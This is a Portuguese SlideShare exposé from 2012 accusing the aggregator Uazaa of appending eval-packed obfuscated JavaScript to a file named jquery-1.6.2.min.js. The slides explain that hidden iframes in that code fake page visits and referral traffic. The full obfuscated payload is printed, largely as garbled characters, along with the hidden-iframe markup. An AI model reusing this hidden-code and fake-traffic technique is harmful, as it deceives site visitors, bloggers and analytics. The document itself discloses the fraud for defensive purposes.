![UAZAAA - Farsa Parte II
Depois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficava no arquivo
jquery-1.6.2.min.js (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js)
Quem não viu dá uma olhada em http://www.slideshare.net/devninjabr/uazaa-uma-farsa que explico a técnica.
Hoje dei uma olhada novamente e vi que ele continua utilizando a fraude.
Desta vez ele utilizou uma forma de criptografia que envolve a função EVAL do javascript e juntamente com uma
criptografia em hexadecimal.
O código se encontra ao final do arquivo (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) que como
disse na Parte I, é um arquivo acima de qualquer suspeita, por se tratar de um arquivo encontrado em quase todos
os blogs...
Apenas para curiosidade, o código encontrado ao final do arquivo é este:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return (c < a ? '' : e(c / a)) + String.fromCharCode(c % a + 161);
};
if (!''.replace(/^/, String))
{
while (c--) {
d[e(c)] = k[c] || e(c)
}
k = [function (e)
{
return d[e]
}];
e = function ()
{
return '[xa1-xff]+';
};
c = 1;
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp(e(c), 'g'), k[c]);
}
}
return p
}
('¢¦ ¶=["£à ¤£¿¤°«®«§«µ«¨«Â¥à ¨¹£¿¤§¥à £³¤§¢§®Ã-
©©ó¨¤£Ö¤§Ø®¥¥¥É¤¤§¹§¢®¥¢¤£ÓãÂ-
Ç£ð¤§ÉªÈ¥ó§Ç£ß¤£Ê¥¥Ã¸£Û¤ï©©Ç£°¤ØñØ«£Â-
¥¥à £»¤§à à ¥Â¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹Â£¿¤¨¥à £³ÔÂ-
¨ÀÃÀ¸¨¹£¿¤¥à £³©¦¦Êɩø§¹£Ã¸£»¤§à à ¥£Û¤µÂ§À¥
°¹°Ç£°¤£âԣ䤩¦¦½©É¨¤§¥É©¦¦½©«©Ä©¥«µÂ§À¥¸£³Ô
°Ã¤©é¤Ó¤°«®«§«µ«¨«Â¥à ¨¹Ó¤§¥à Ö
Ô§Ç줮¥Ã¸Õ¤ï¦©¦©ÇܤØñث륥à Ú¤§à à ¥Â-
¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹ÂÓ¤¨¥à ÖÔ¨ÀÃÀ¸¨¹Ó¤¥à Ö
¦©¦¦¦¦Êɦ©Ã¸§¹£Ã¸Ú¤§à à ¥Õ¤µÂ§À¥°¹°ÇܤèÔ夦©¦
¦¦¦½¦©É¨¤§¥É¦©¦¦¦¦½¦©«¦©Ä¦©¥«µÂ§À¥¸Ö
԰䦩äÇߤ⤦¦¦©¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢
»¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢
¨¢Å¢£¢Â-
¢±¢¬¢¯¢³¢Ì¢Ê¢¨¢¯¢¯¢£¢ª¢»¢ª¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢
¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢
Å¢¾¢¿¢ð¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ
¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â-
¢±¢¬¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢
º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¦¦¦©¥¥¸¦©«à «à «¦©ê
¡ò¡ø¡ü¡ô¡ÿ¡ç¡á¡þ¡¢¡¡ý¡ú¡ö¡õ¡÷¡£²¡££¡£ª¡£±¡£¾
¡£¼¡£¬¡£¯¡£Å¡£È¡£®¡£½¡£§¡£Ì¡£¨¡£Î¡£Ä¡£Ñ¡£º¡
£Ù¡£µ¦©Ç£Æ¤¦©¡¦©¥«²«à Ã¥¥©«£·«£à «©¡¡¡¡¡¡¡¡¡¡¡
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡£¿¡£³¡£Ê¡£°¡£Û¡£»¡
£Â-
¡£â¡£ä¡£à ¡£ß¡£Ü¡£Õ¡£Ú¡£ë¡£è¡ª¯¡£å¡£é¡£ì¡£ê¡
£ò¡£ø¡£ü¡£ô¡£ÿ¡£ç¡£á¡£þ¡£¢¡¡£ý¡£ú¡ª²¡£ö¡£õ¡£
÷¡ª£¡ªª¡£·¡ª±¡ª¾¡ª¼¡ª¬¡ªÅ¡ª®¡ª½¡ª§¡£Ò©Ç£Ò¤©¡
©¥«²«à Ã¥¥","¡","à °Æº·","¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡Â
¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡ÃŽÃ’³§·º»³¡Â¨·Ò³¡ÊѺƨ¡Â-
¨°Æ®§¨¡ºÎ¡á·Âº³Ä¡¨ß®Æ¡¬ª¡à °Æº·¡·»á·Â-
º³Ä¡±¬¡³¨Ê¡ç¨ÄÕⰡλ¿à Ñ®Âà »Ì¨¡±¼¡°®Â-
à ¨å³·¡Å¾¡¬£¡ªÕ¡¯²¡¯ª¡¬¼¡ªÚ¡¬¬¡¬Ü¡¯±¡¯¾¡¬È¡¯
¯¡¬±¡¬Ú¡±à ¡±Ü¡±Ó¡¬Õ¡¬à ¡¯È¡±Õ¡¯¼¡¬Å¡¡¬¯¡¯Å¡¯Ó
¡¬¾¡±Ö¡Êº·¨¡¡¬Ö¡¡Ò³¨à §®°¨¡Ì»§Ò¿¨³·¡²Ó","","ÃŽÂ-
»¿à Ñ®Âà »Ì¨","¨°Æ®§¨","¦ÊÉ","¦½","Ä"];¢¢(Þ(à ,ã,´,×
,Ë,æ){Ë=Þ(´){à (´<ã?¶[4]:Ë(¢£(´/ã)))+((´=´%ã)>¢¥?ù[¶[5]](´+¢®):´.¢Â(¢«))};î(!¶[4][¶[6]](/^/,ù)){û(´--){æ[Ë(´)]=×[´]||Ë(´)};×
=[Þ(Ë){à æ[Ë]}];Ë=Þ(){à ¶[7]};´=1};û(´--){î(×[´]){à =à [¶[6]](¢ª ¢©(¶[8]+Ë(´)+¶[8],¶[9]),×
[´])}};à à }(¶[0],¢¨,¢¬,¶[3][¶[2]](¶[1]),0,{}));',
95, 109, 'x7C|x25|x31|x28|x29|x5C|x63|x65|x27|x32|x2C|x36|x72|x61|x37|x70|x33|x30|x6E|_0x1c28x3|x6B|_0x3d99|x74|x3B|x3D|x69|x6F|x35|x62|x34|x6D|x5D|x7B|x5B|x7D|x67|x38|x6C|x2
E|x39|x2B|x77|_0x1c28x5|x64|x43|x66|x2D|x73|x68|x75|x41|x20|x45|x42|_0x1c28x4|x2F|x6A|x46|x71|x44|return|function|x76|_0x1c28x1|x53|x78|_0x1c28x2|x79|x49|_0x1c28x6|x52|x48|x4
A|x4C|x47|x4B|x3F|if|x21|x7A|x5E|x4D|x3A|x50|x59|x58|x5A|x4E|String|x57|while|x4F|x56|x54|x51|x55|eval|parseInt|x3E|35|var|x3C|62|RegExp|new|36|137|toString|29'.split('|'),
0, {}))](https://image.slidesharecdn.com/uazaa-uma-farsa-parte2-120113175858-phpapp01/85/Uazaa-uma-farsa-parte-2-1-320.jpg)
Recomendados
Mais conteúdo relacionado
Mais procurados
Mais procurados (20)
Destaque
Semelhante a Uazaa uma-farsa-parte 2
Semelhante a Uazaa uma-farsa-parte 2 (20)
Último
Último (20)
Uazaa uma-farsa-parte 2
- 1. UAZAAA - Farsa Parte II Depois da nossa primeira denúncia, o pessoal deste agregador tirou o código criptografado que ficava no arquivo jquery-1.6.2.min.js (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) Quem não viu dá uma olhada em http://www.slideshare.net/devninjabr/uazaa-uma-farsa que explico a técnica. Hoje dei uma olhada novamente e vi que ele continua utilizando a fraude. Desta vez ele utilizou uma forma de criptografia que envolve a função EVAL do javascript e juntamente com uma criptografia em hexadecimal. O código se encontra ao final do arquivo (http://www.uazaa.xpg.com.br/widgets/jquery-1.6.2.min.js) que como disse na Parte I, é um arquivo acima de qualquer suspeita, por se tratar de um arquivo encontrado em quase todos os blogs... Apenas para curiosidade, o código encontrado ao final do arquivo é este: eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(c / a)) + String.fromCharCode(c % a + 161); }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '[xa1-xff]+'; }; c = 1; }; while (c--) { if (k[c]) { p = p.replace(new RegExp(e(c), 'g'), k[c]); } } return p } ('¢¦ ¶=["£à ¤£¿¤°«®«§«µ«¨«Â¥à ¨¹£¿¤§¥à £³¤§¢§®Ã- ©©ó¨¤£Ö¤§Ø®¥¥¥É¤¤§¹§¢®¥¢¤£ÓãÂ- Ç£ð¤§ÉªÈ¥ó§Ç£ß¤£Ê¥¥Ã¸£Û¤ï©©Ç£°¤ØñØ«£Â- ¥¥à £»¤§à à ¥Â¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹Â£¿¤¨¥à £³ÔÂ- ¨ÀÃÀ¸¨¹£¿¤¥à £³©¦¦Êɩø§¹£Ã¸£»¤§à à ¥£Û¤µÂ§À¥ °¹°Ç£°¤£âԣ䤩¦¦½©É¨¤§¥É©¦¦½©«©Ä©¥«µÂ§À¥¸£³Ô °Ã¤©é¤Ó¤°«®«§«µ«¨«Â¥à ¨¹Ó¤§¥à Ö Ô§Ç줮¥Ã¸Õ¤ï¦©¦©ÇܤØñث륥à Ú¤§à à ¥Â- ¨¤§¥À¹µÂ§À¡¡¨¤§¥¸µ¹ÂÓ¤¨¥à ÖÔ¨ÀÃÀ¸¨¹Ó¤¥à Ö ¦©¦¦¦¦Êɦ©Ã¸§¹£Ã¸Ú¤§à à ¥Õ¤µÂ§À¥°¹°ÇܤèÔ夦©¦ ¦¦¦½¦©É¨¤§¥É¦©¦¦¦¦½¦©«¦©Ä¦©¥«µÂ§À¥¸Ö ԰䦩äÇߤ⤦¦¦©¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢ »¢®¢®¢ª¢Ñ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢ ¨¢Å¢£¢Â- ¢±¢¬¢¯¢³¢Ì¢Ê¢¨¢¯¢¯¢£¢ª¢»¢ª¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢ ¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢ Å¢¾¢¿¢ð¢Î¢½¢¯¢±¢²¢Å¢¾¢Æ¢È¢±¢Ì¢Ä¢¼¢»¢®¢®¢ª¢Ñ ¢¬¢¬¢§¢§¢§¢£¢³¢²¢à ¢²¢²¢£¢Û¢ª¢°¢£¢Ì¢¨¢Å¢£¢Â- ¢±¢¬¢¼¢Æ¢È¢®¢µ¢Ù¢¾¢Ä¢¼¢·¢½¢È¢ª¢Ù¢²¢µ¢Ñ¢º¢¨¢ º¢¾¢Ò¢¼¢¿¢Î¢¬¢½¢¯¢±¢²¢Å¢¾¢¿¦¦¦©¥¥¸¦©«à «à «¦©ê ¡ò¡ø¡ü¡ô¡ÿ¡ç¡á¡þ¡¢¡¡ý¡ú¡ö¡õ¡÷¡£²¡££¡£ª¡£±¡£¾ ¡£¼¡£¬¡£¯¡£Å¡£È¡£®¡£½¡£§¡£Ì¡£¨¡£Î¡£Ä¡£Ñ¡£º¡ £Ù¡£µ¦©Ç£Æ¤¦©¡¦©¥«²«à Ã¥¥©«£·«£à «©¡¡¡¡¡¡¡¡¡¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡£¿¡£³¡£Ê¡£°¡£Û¡£»¡ £Â- ¡£â¡£ä¡£à ¡£ß¡£Ü¡£Õ¡£Ú¡£ë¡£è¡ª¯¡£å¡£é¡£ì¡£ê¡ £ò¡£ø¡£ü¡£ô¡£ÿ¡£ç¡£á¡£þ¡£¢¡¡£ý¡£ú¡ª²¡£ö¡£õ¡£ ÷¡ª£¡ªª¡£·¡ª±¡ª¾¡ª¼¡ª¬¡ªÅ¡ª®¡ª½¡ª§¡£Ò©Ç£Ò¤©¡ ©¥«²«à Ã¥¥","¡","à °Æº·","¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡Â¡ÃŽÃ’³§·º»³¡Â¨·Ò³¡ÊѺƨ¡Â- ¨°Æ®§¨¡ºÎ¡á·Âº³Ä¡¨ß®Æ¡¬ª¡à °Æº·¡·»á·Â- º³Ä¡±¬¡³¨Ê¡ç¨ÄÕⰡλ¿à Ñ®Âà »Ì¨¡±¼¡°®Â- à ¨å³·¡Å¾¡¬£¡ªÕ¡¯²¡¯ª¡¬¼¡ªÚ¡¬¬¡¬Ü¡¯±¡¯¾¡¬È¡¯ ¯¡¬±¡¬Ú¡±à ¡±Ü¡±Ó¡¬Õ¡¬à ¡¯È¡±Õ¡¯¼¡¬Å¡¡¬¯¡¯Å¡¯Ó ¡¬¾¡±Ö¡Êº·¨¡¡¬Ö¡¡Ò³¨à §®°¨¡Ì»§Ò¿¨³·¡²Ó","","ÃŽÂ- »¿à Ñ®Âà »Ì¨","¨°Æ®§¨","¦ÊÉ","¦½","Ä"];¢¢(Þ(à ,ã,´,× ,Ë,æ){Ë=Þ(´){à (´<ã?¶[4]:Ë(¢£(´/ã)))+((´=´%ã)>¢¥?ù[¶[5]](´+¢®):´.¢Â(¢«))};î(!¶[4][¶[6]](/^/,ù)){û(´--){æ[Ë(´)]=×[´]||Ë(´)};× =[Þ(Ë){à æ[Ë]}];Ë=Þ(){à ¶[7]};´=1};û(´--){î(×[´]){à =à [¶[6]](¢ª ¢©(¶[8]+Ë(´)+¶[8],¶[9]),× [´])}};à à }(¶[0],¢¨,¢¬,¶[3][¶[2]](¶[1]),0,{}));', 95, 109, 'x7C|x25|x31|x28|x29|x5C|x63|x65|x27|x32|x2C|x36|x72|x61|x37|x70|x33|x30|x6E|_0x1c28x3|x6B|_0x3d99|x74|x3B|x3D|x69|x6F|x35|x62|x34|x6D|x5D|x7B|x5B|x7D|x67|x38|x6C|x2 E|x39|x2B|x77|_0x1c28x5|x64|x43|x66|x2D|x73|x68|x75|x41|x20|x45|x42|_0x1c28x4|x2F|x6A|x46|x71|x44|return|function|x76|_0x1c28x1|x53|x78|_0x1c28x2|x79|x49|_0x1c28x6|x52|x48|x4 A|x4C|x47|x4B|x3F|if|x21|x7A|x5E|x4D|x3A|x50|x59|x58|x5A|x4E|String|x57|while|x4F|x56|x54|x51|x55|eval|parseInt|x3E|35|var|x3C|62|RegExp|new|36|137|toString|29'.split('|'), 0, {}))
- 2. Com este caracteres estranhos não entendemos nada, não é mesmo ? Desta forma, quando visualizamos o código fonte da página, ninguém consegue entender o que este código faz. Bom amigo blogueiro, agora vou explicar para vocês, uma forma para verificar se algum site está utilizando de artimanhas para mandar visitas. Existe um plugin do Firefox que se chama Firebug (http://firebug.softonic.com.br/download) Ele é uma ferramenta que ajuda os programadores na hora de desenvolver sites. Uma das inúmeras funcionalidades dele é mostrar como seria o código fonte, independente se o cara criptografou... Vamos agora ao exemplo, usando o nosso Agregador Favorito. Vamos direto ao arquivo do trambique: o dos Widgets... http://www.uazaa.xpg.com.br/widgets/250x250.php Ativamos o Firebug e... Aparece o código fonte já descriptografado... Tcham tcham tcham tcham!!!!
- 3. Achamos os IFRAMES.... ☺ Explicando o método: Uma das exigências de parceria do Uazaa é a utilização do widget em todos os blogs parceiros. Desta forma, quando alguém acessa o seu blog, TODO acesso gera um acesso à página inicial do uazaa e também um acesso falso para algum blogueiro (geralmente os que ficam no topo durante o dia). O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/fuckoff.php"> gera um link aleatório para que o uazaa mande visitas para algum blogueiro. (Experimente acessar http://www.uazaa.xpg.com.br/fuckoff.php que toda vez é um site diferente) PS: Logo após a denúncia, ele alterou o nome do script para: http://www.uazaa.com.br/newRed.php (atualização feita em 14/01/2012)
- 4. O <iframe style="display:none;" src="http://www.uazaa.xpg.com.br/"> Gera um acesso para a home do uazaa... Por exemplo: Se vc tiver 50 online no seu blog, o widget será carregado 50 vezes... e automaticamente será contado + 50 acessos na home do uazaa... E de quebra o uazaa manda visitas falsas para 50 blogs. Tá dado o recado... 13/01/2012 @devninjaBR